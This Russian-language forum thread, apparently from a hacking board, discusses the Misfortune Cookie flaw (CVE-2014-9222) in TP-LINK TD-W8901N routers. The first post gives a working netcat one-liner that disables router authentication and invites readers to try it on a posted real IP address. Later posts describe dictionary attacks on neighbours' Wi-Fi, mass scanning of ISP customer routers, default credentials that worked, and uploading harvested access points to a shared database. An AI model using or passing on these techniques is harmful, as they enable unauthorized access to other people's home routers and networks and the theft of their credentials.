 |
|
14.03.2016, 15:33
|
|
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
Провел на форуме:
109967
Репутация:
171
|
|
#exploit
Уязвимость Misfortune Cookie применительно к TP-LINK TD-W8901N
Изучая информацию по TR-069, опять наткнулся на упоминания уязвимости CVE-2014-9222 Misfortune Cookie во встраиваемом веб-сервере RomPager, а конкретно, вот на эту презентацию: http://www.rsaconference.com/writab...things-one-exploit-to-rule-them-all_final.pdf. Там есть некоторые технические подробности данной уязвимости и ссылка (http://cawanblog.blogspot.ru/2015/02/misfortune-cookie-cve-2014-9222.html) на пример её реализации для TD-W8901N.
Чтобы получить доступ к настройкам данной модели роутера без необходимости ввода пароля, нужно отправить запрос с "Cookie: C107353880=\0", что равносильно выполнению команды "sys pswauthen 0". С curl этого сделать не получиться, но можно отправить пакет, например, с помощью netcat:
Код:
echo $'GET / HTTP/1.1\nCookie: C107353880=\x00' | nc
От себя добавлю, что вернуть аутентификацию, можно аналогичным образом:
Код:
echo $'GET / HTTP/1.1\nCookie: C107353880=\x01' | nc
Кто хочет поразвлекаться, вот ip, на котором это работает: 46.244.71.I58
|
|
|
14.03.2016, 19:16
|
|
Member
Регистрация: 05.03.2016
Сообщений: 22
Провел на форуме:
4969
Репутация:
0
|
|
Сообщение от Felis-Sapiens
P.P.S А домрушных ZTE ZXHN H118N (если речь о подключении к wifi) есть словарик.
у меня по этому словарю 50/50 - 2 из 4х точек сдались. две либо с меняными паролями, либо словарь не полный. надо будет заняться и проверить их еще раз.
в локалке другого провайдера около тысячи ZTE H218N, бери - не хочу, только RS инфу из них не выдирает
|
|
|
|
15.03.2016, 21:06
|
|
Познающий
Регистрация: 18.05.2015
Сообщений: 71
Провел на форуме:
21292
Репутация:
0
|
|
а внутренние адреса пощупать московской oнлиm- ни кто не в курсе? )
|
|
|
|
15.03.2016, 21:08
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от Vovan71
а внутренние адреса пощупать московской oнлиm- ни кто не в курсе? )
Их можно пощупать только находясь внутри неё.
Точек входа извне пока не обнаружил.
|
|
|
|
15.03.2016, 21:30
|
|
Познающий
Регистрация: 18.05.2015
Сообщений: 71
Провел на форуме:
21292
Репутация:
0
|
|
так я внутри )
|
|
|
|
15.03.2016, 21:56
|
|
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
Провел на форуме:
109967
Репутация:
171
|
|
Сообщение от Vovan71
так я внутри )
Ну, тогда начинай с 10.224.0.0 (если речь про onlimе)
|
|
|
|
16.03.2016, 04:39
|
|
Познающий
Регистрация: 28.11.2015
Сообщений: 30
Провел на форуме:
5787
Репутация:
0
|
|
У меня есть возможность войти в onlime вовнутрь могу потестить, правда связь дохленькая, сейчас сканю диапазон MGTS те у которых белые IP есть, интересная особенность, в основном там три модели ZTE F660, hardware: 2.3, firmware: 2.3.1P1T7S пробиваются на 443 порту сдают всю инфу, Sercomm Atron RFT620 тоже самое,а вот какие то HuaweiHomeGateway не сдаются, порты в основном 58000 7457,соотношение примерно 1% гудов, но вот один интересный экземпляр попался из ZTE на порту 58000, пароль и логин сдал admin:1234 а дальше глухо, по этому порту в браузере вот такая строка " This XML file does not appear to have any style information associated with it. The document tree is shown below." Досканю может выложу, но блин у меня вопрос почему меня на http://3wifi.stascorp.com/map по гостевому antichat аккаунту не логинит?Да и сайт тормозит просто жутко.
|
|
|
|
16.03.2016, 11:09
|
|
Познающий
Регистрация: 18.05.2015
Сообщений: 71
Провел на форуме:
21292
Репутация:
0
|
|
Благодарю выше за подсказку.
Конечно же весь онлим практически уже был на сайте Но! Сумел найти 170 уникальных точек и залил вчера
У меня новый вопрос - вот допустим сижу я в другой сетке. Хочу ее пощупать и внести свою лепту (опять же залить на сайт).
Как узнать внутренние адреса сетки?
10.х.х.х или 100.х.х.х как экспресс просканировать? Перепрыгивая через последнюю цифру - проффи поделитесь опытом.
|
|
|
|
16.03.2016, 13:04
|
|
Новичок
Регистрация: 16.09.2009
Сообщений: 0
Провел на форуме:
14577
Репутация:
0
|
|
Сообщение от Vovan71
Благодарю выше за подсказку.
Конечно же весь онлим практически уже был на сайте Но! Сумел найти 170 уникальных точек и залил вчера
У меня новый вопрос - вот допустим сижу я в другой сетке. Хочу ее пощупать и внести свою лепту (опять же залить на сайт).
Как узнать внутренние адреса сетки?
10.х.х.х или 100.х.х.х как экспресс просканировать? Перепрыгивая через последнюю цифру - проффи поделитесь опытом.
- 3.2. Использование tracert
- 3.3. Использование nslookup
|
|
|
|
16.03.2016, 19:51
|
|
Познающий
Регистрация: 18.05.2015
Сообщений: 71
Провел на форуме:
21292
Репутация:
0
|
|
(посыпая голову пеплом)
Пошел читать инструкцию
Спасибо
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
